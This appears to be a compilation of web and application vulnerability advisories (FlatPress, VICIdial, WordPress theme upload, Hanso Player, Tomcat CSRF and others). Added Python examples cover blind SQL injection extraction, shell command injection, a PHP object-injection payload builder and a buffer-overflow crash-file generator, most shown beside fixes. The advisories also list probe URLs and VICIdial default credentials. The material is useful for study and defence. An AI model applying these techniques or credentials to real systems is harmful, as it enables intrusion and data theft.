This blended threat exploits a vulnerability in FlatPress, a flat-file blogging CMS, by executing PHP code injected through a comment. The exploit requires the inlinePHP plugin to be enabled. The attacker posts a comment containing the malicious code, then uses directory traversal to have the stored comment loaded as a page, at which point the inlinePHP plugin executes the embedded code.
The vulnerability is caused by insufficient validation of user-supplied data appended to the "/blog-by-cat/" URL. A remote attacker can execute arbitrary SQL commands to read, modify or delete information in the application's database. The injection is blind and boolean-based: the following request displays all posts from category 1 if the MySQL server version is 5.x and no posts otherwise, so the attacker can infer database contents one true/false condition at a time: http://[host]/blog-by-cat/1%20and%20substring(version(),1,1)=5/
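The following is an added example, not code from the advisory or from the affected blog software. It reproduces the advisory's probe URL, shows the string-concatenated query that makes such a probe possible beside a bound-parameter fix, and then generalizes the single "first digit is 5" test into a loop that recovers the whole version string from nothing but the posts-shown / no-posts oracle. SQLite stands in for the MySQL back end (so the functions are sqlite_version() and substr() rather than version() and substring()); the table, its rows and the column name cat_id are constructed here.

```python
"""Boolean-based blind SQL injection through the /blog-by-cat/<id>/ path.

Added example, not code from the original advisory or the affected application.
SQLite stands in for the real MySQL back end (sqlite_version() instead of
version(), substr() instead of substring()); the posts table, its rows and the
cat_id column are constructed here.
"""
import sqlite3
import urllib.parse

# The advisory's own probe: category 1 is listed only if the first version digit is 5.
ADVISORY_PROBE = "1 and substring(version(),1,1)=5"


def probe_url(host, payload):
    """Build the /blog-by-cat/ request the way the advisory writes it (spaces as %20)."""
    return f"http://{host}/blog-by-cat/{urllib.parse.quote(payload, safe='(),=')}/"


def make_db():
    """Constructed stand-in for the blog database: two categories, three posts."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE posts(id INTEGER PRIMARY KEY, cat_id INTEGER, title TEXT);"
        "INSERT INTO posts(cat_id, title) VALUES (1,'first'),(1,'second'),(2,'other');"
    )
    return con


def posts_by_cat_vulnerable(con, cat):
    """The flaw the advisory describes: the path segment is pasted into the WHERE clause."""
    sql = "SELECT title FROM posts WHERE cat_id = " + cat  # no validation, no binding
    return [row[0] for row in con.execute(sql)]


def posts_by_cat_fixed(con, cat):
    """Fix: accept only an integer and pass it as a bound parameter."""
    if not cat.isdigit():
        raise ValueError("category id must be an integer")
    rows = con.execute("SELECT title FROM posts WHERE cat_id = ?", (int(cat),))
    return [row[0] for row in rows]


def oracle(con, condition):
    """True when the injected condition holds (posts listed), False when the page is empty."""
    return len(posts_by_cat_vulnerable(con, "1 and " + condition)) > 0


def extract_version(con, version_fn="sqlite_version()", alphabet="0123456789.", max_len=32):
    """Generalize the advisory's one-digit probe: recover the whole version string,
    one character per position, from the yes/no oracle alone.  The loop ends when no
    candidate matches, i.e. we have walked past the end of the string."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if oracle(con, f"substr({version_fn},{pos},1)='{ch}'"):
                found += ch
                break
        else:
            break
    return found


def real_version():
    """Ground truth the blind extraction should reproduce."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    db = make_db()
    print(probe_url("[host]", ADVISORY_PROBE))
    print("extracted:", extract_version(db), "actual:", real_version())
```

Against a live MySQL target each oracle() call is one HTTP request and the "posts shown" test becomes a check on the response body; the loop structure is unchanged.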
The file agc/manager_send.php in the VICIdial web application uses unsanitized user input as part of a command that is executed with the PHP passthru() function. A valid username, password and session are needed to reach the injection point. However, VICIdial ships with two built-in accounts that have default passwords, and manager_send.php also contains a SQL injection vulnerability that can be used to bypass the session check as long as at least one session has been created at some point in time. If no valid session exists, the attacker can supply astGUIclient credentials to create one. The output of the injected command is returned as part of the web server's response. Affected versions include 2.7RC1, 2.7 and 2.8-403a; other versions are likely affected as well. The default credentials used by VICIdial are VDCL/donotedit and VDAD/donotedit.
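An added example of the passthru() pattern the advisory describes, not code from the advisory or from VICIdial: a request parameter spliced into a shell command line whose output is handed back to the caller, next to the hardened form (allowlist on the value plus an argument vector with no shell). Python's subprocess stands in for PHP's passthru(); the command (echo) and the parameter are constructed here.

```python
"""Shell command injection of the passthru() kind, and its fix.

Added example, not code from the original advisory or from VICIdial.  A Python
subprocess call stands in for PHP's passthru(); the command ('echo') and the
parameter value are constructed here.  The mechanism is the same: attacker text
lands inside a shell command line and the command's output is echoed back.
"""
import re
import subprocess


def run_vulnerable(value):
    """The advisory's pattern: the request parameter is spliced into a shell string.
    A ';' in the value ends the intended command, so whatever follows runs too, and
    because stdout is returned to the caller the attacker reads the result in the
    HTTP response."""
    cmd = "echo " + value
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def run_fixed(value):
    """Two independent fixes: an allowlist on the value, and an argument vector with
    no shell, so metacharacters never reach an interpreter even if the allowlist is
    later loosened by mistake."""
    if not SAFE_VALUE.fullmatch(value):
        raise ValueError("rejected parameter value")
    return subprocess.run(["echo", value], capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "campaign1; echo INJECTED"
    print(run_vulnerable(payload))  # both commands execute; INJECTED appears in the output
    try:
        run_fixed(payload)
    except ValueError as e:
        print("fixed:", e)
```

escapeshellarg() around the value is the PHP-side equivalent of the argument-vector fix, but the allowlist should stay regardless: it also stops values that are syntactically harmless to the shell yet meaningful to the invoked program, such as ones beginning with "-".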
User input passed through the 'Messages' and 'Response' POST parameters is not properly sanitized before being used in a call to the 'Gdn_Format::Unserialize' method at lines 327 and 360. This can be exploited to inject arbitrary PHP objects into the application scope (PHP object injection). An attacker could leverage this to conduct Local File Inclusion attacks by abusing the 'Gdn_Module::__toString' method, which triggers a call to the 'Gdn_Module::FetchView' method.
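An added example, not code from the advisory or from the affected forum software, showing both sides of a PHP object injection: an encoder for PHP's native serialization format that produces the O: record an attacker would place in the 'Messages' parameter, and the guard a defender would put in front of Unserialize, a walker that refuses any input carrying an object no matter how deeply it is nested. The class name Gdn_Module comes from the advisory; which property Gdn_Module::FetchView reads is not stated there, so the property set passed to build_injected_message() is a placeholder.

```python
"""PHP object injection via unserialize(): building the payload and gating the input.

Added example, not code from the original advisory or the affected software.
php_serialize() emits PHP's native serialization format.  The class name
Gdn_Module is from the advisory; the properties a real payload would set are not
stated there and are left to the caller as placeholders.  contains_object() is
the input gate a defender adds before Unserialize.
"""


class PhpObject:
    """An O:... record: class name plus an ordered property mapping."""

    def __init__(self, cls, props):
        self.cls, self.props = cls, dict(props)


def php_serialize(v):
    """Encode None/bool/int/float/str/list/dict/PhpObject as PHP's serialize() would.
    String lengths are byte lengths (UTF-8), as in PHP."""
    if v is None:
        return "N;"
    if isinstance(v, bool):  # before int: bool is a subclass of int
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, float):
        return f"d:{v};"
    if isinstance(v, str):
        return f's:{len(v.encode("utf-8"))}:"{v}";'
    if isinstance(v, (list, tuple, dict)):
        items = list(v.items()) if isinstance(v, dict) else list(enumerate(v))
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in items)
        return f"a:{len(items)}:{{{body}}}"
    if isinstance(v, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.props.items())
        return f'O:{len(v.cls)}:"{v.cls}":{len(v.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(v).__name__}")


def contains_object(data):
    """Walk serialized data honouring declared string lengths and report whether an
    O: record occurs anywhere.  Strings are skipped by their declared length, so an
    'O:' that merely appears inside a string value does not trigger.  ASCII input
    assumed (PHP counts bytes, this walker counts characters)."""
    pos = 0

    def parse():
        nonlocal pos
        tag = data[pos]
        if tag == "N":
            pos += 2  # N;
            return False
        if tag in "bid":
            pos = data.index(";", pos) + 1
            return False
        if tag == "s":
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])
            pos = colon + 2 + length + 2  # skip :"<string>";
            return False
        if tag == "a":
            colon = data.index(":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2  # skip :{
            found = False
            for _ in range(count):
                found = parse() or found  # key
                found = parse() or found  # value
            pos += 1  # skip }
            return found
        if tag == "O":
            return True
        raise ValueError(f"malformed input at offset {pos}")

    return parse()


def build_injected_message(props):
    """Attacker side: the value the 'Messages' parameter would carry.  Property names
    are placeholders supplied by the caller, not taken from the advisory."""
    return php_serialize(PhpObject("Gdn_Module", props))
```

The gate is the same idea PHP later exposed natively as unserialize()'s allowed_classes option; where the application only ever expects arrays and scalars, rejecting every O: record costs nothing and removes the whole class of gadget-chain attacks.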
RASPcalendar 1.01 contains an authentication bypass vulnerability. An attacker can exploit it by sending a specially crafted HTTP request to the application, bypassing authentication and gaining access to it.
A vulnerability in the WordPress 'themekernel-theme' theme allows an attacker to upload an arbitrary file to the server. The vulnerable file is upload-handler.php, located in the theme's functions folder. An attacker exploits it by sending a POST request to upload-handler.php with a malicious file attached; the file is stored under the uploads directory and can then be requested directly, e.g. http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
Input passed via the 'for_id' parameter is not properly sanitised before being used in database queries. This can be exploited to extract sensitive information from the database(s).
Hanso Player 2.5.0 contains a buffer overflow caused by improper bounds checking of user-supplied input. An attacker can exploit it by crafting a malicious M3U playlist file and convincing the user to open it, resulting in arbitrary code execution.
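An added example, not the original Hanso Player exploit, of the first step in turning "a crafted M3U overflows a buffer" into a working exploit: generating the playlist with a cyclic pattern and mapping the value that lands in the instruction pointer back to an offset in the file. The playlist layout (an #EXTM3U header followed by one over-long entry) and the pattern length are constructed here; the advisory states only that a crafted M3U triggers the overflow. The pattern is the Metasploit pattern_create/pattern_offset technique, in which every 4-byte window is unique.

```python
"""Crafting the malicious M3U and locating the overwrite offset.

Added example, not the original exploit for Hanso Player.  The playlist layout
and the pattern length are constructed here; the advisory only states that a
crafted M3U overflows a buffer.  The cyclic pattern reproduces Metasploit's
pattern_create/pattern_offset: each 4-byte window is unique, so the value read
from the crashed instruction pointer maps to exactly one offset in the file.
"""
import string
import struct


def pattern_create(length):
    """Cyclic 'Aa0Aa1Aa2...' pattern; unique 4-byte windows for up to 20280 bytes
    (26 * 26 * 10 three-character groups)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value, length=5000):
    """Offset of a crashed register value within pattern_create(length).
    Accepts either the 4 characters as shown by a debugger or the register as an
    integer, which is unpacked little-endian as a 32-bit x86 register would be.
    Returns -1 if the value is not part of the pattern (the register was not
    overwritten by our data)."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii", errors="replace")
    else:
        needle = value
    return pattern_create(length).find(needle)


def build_m3u(length):
    """The attack file: an extended-M3U header and one entry far longer than any
    sane path (constructed layout; see module docstring)."""
    return "#EXTM3U\n" + pattern_create(length) + "\n"


if __name__ == "__main__":
    with open("crash.m3u", "w") as f:
        f.write(build_m3u(5000))
    # After the crash, feed the EIP value read from the debugger back in;
    # that offset is where the saved return address sits in the entry.
    print(pattern_offset(0x41326141))
```

Once the offset is known, the pattern is replaced by filler up to that offset, the new return address, and the payload; those values depend on the target binary and are deliberately not guessed here.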
Apache Tomcat 5.5.25 and below (other versions could be affected) is prone to a CSRF vulnerability in the Manager application (the component used to start/stop/deploy/undeploy web applications). By luring an administrator who is authenticated to the Manager into loading a malicious page, an attacker can perform actions such as stopping an existing application, undeploying an existing application, or deploying a new one. This exploit demonstrates how to automatically undeploy an existing application.
Multiple client-side (non-persistent) cross-site scripting vulnerabilities were detected in the official pdirl PHP Directory Listing web application. They allow remote attackers to manipulate client-side browser requests to the web application via the GET method. The cross-site scripting issue is located in the vulnerable index.php file, in the 'id' path value.